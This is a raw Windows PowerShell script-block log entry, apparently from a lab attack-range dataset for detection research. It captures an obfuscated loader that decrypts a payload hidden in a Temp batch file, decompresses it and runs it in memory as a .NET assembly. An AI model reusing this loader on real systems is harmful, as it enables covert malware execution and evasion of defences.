4104132150x0124039Microsoft-Windows-PowerShell/Operationalwin-dc-ctus-attack-range-961.attackrange.local11$PPEQX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Administrator\AppData\Local\Temp\rmzisb.bat').Split([Environment]::NewLine);foreach ($ISDmE in $PPEQX) { if ($ISDmE.StartsWith(':: ')) { $kfDpT = $ISDmE.Substring(3); break; }; };$qhlsi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($kfDpT);$sMaNL = New-Object System.Security.Cryptography.AesManaged;$sMaNL.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sMaNL.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sMaNL.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fORyY3/kFcJCTB3T7nnYrDmtsAUyW1dufJ7r580FOfQ=');$sMaNL.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w2NvsEq4CVYgOm4J93NDjA==');$NJjYs = $sMaNL.CreateDecryptor();$qhlsi = $NJjYs.TransformFinalBlock($qhlsi, 0, $qhlsi.Length);$NJjYs.Dispose();$sMaNL.Dispose();$iVBHx = New-Object System.IO.MemoryStream(, $qhlsi);$gYqjQ = New-Object System.IO.MemoryStream;$wZmtk = New-Object System.IO.Compression.GZipStream($iVBHx, [IO.Compression.CompressionMode]::Decompress);$wZmtk.CopyTo($gYqjQ);$wZmtk.Dispose();$iVBHx.Dispose();$gYqjQ.Dispose();$qhlsi = $gYqjQ.ToArray();$FxMTS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($qhlsi);$ARGvJ = $FxMTS.EntryPoint;$ARGvJ.Invoke($null, (, [string[]] ('')))38ca9051-e868-45a8-ada3-19345b155cd9